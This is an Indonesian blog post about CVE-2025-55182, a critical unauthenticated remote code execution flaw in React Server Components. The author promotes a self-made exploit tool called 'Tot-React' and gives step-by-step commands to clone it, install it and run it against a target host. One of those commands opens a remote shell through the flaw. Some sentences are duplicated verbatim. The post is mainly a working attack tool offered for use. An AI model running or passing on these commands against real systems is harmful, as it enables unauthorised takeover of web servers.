Informasi CVE-2025-55182
Pada tanggal 29 November, Lachlan Davidson melaporkan kerentanan
keamanan di React yang memungkinkan eksekusi kode jarak jauh tanpa
otentikasi dengan mengeksploitasi celah dalam cara React mendekode
muatan yang dikirim ke endpoint React Server Function.
Meskipun aplikasi Anda tidak mengimplementasikan
endpoint React Server Function apa pun, aplikasi tersebut mungkin
masih rentan jika mendukung React Server Components.
Kerentanan ini diungkapkan sebagai CVE-2025-55182
dan diberi peringkat CVSS 10.0.
oke lanjut berikut....
sebenarnya artikel ini pengen saya buat bulan desember 2025
ya karena banyak kerjaan lain jadi saya pending dulu hehehe...
ya karena banyak kerjaan lain jadi saya pending dulu hehehe...
saya mencoba membuat poc dari sumber berbagi repository lain nya
yang saya modifikasi hingga bisa eksekusi shell dari keretanan
CVE-2025-55182 ini, yang saya namakan tools nya Tot-react
CVE-2025-55182 ini, yang saya namakan tools nya Tot-react
langsung ini tools yang saya buat untuk poc CVE-2025-55182
Tot React RCE - Next.js tool build python 3.
Dependensi yang di pakai :
- aiohttp
- termcolor (opsional)
- tabulate (opsional)
clone git dari repository :
$ git clone https://github.com/gagaltotal/tot-react-rce-CVE-2025-55182
Instal dependensi :
$ pip install -r requirements.txt
menjalankan tools Tot-React :
$ python3 main.py -u target.com
menjalankan menu list :
$ python3 main.py --list
menjalankan eksekusi shell RCE :
$ python3 main.py -u target.com --shell
berikut ini video tutorial :
oke mungkin itu saja sekian dan semoga bermanfaat
Referensi Docs : [Blog React] [github]
){kind=link}
0 Comments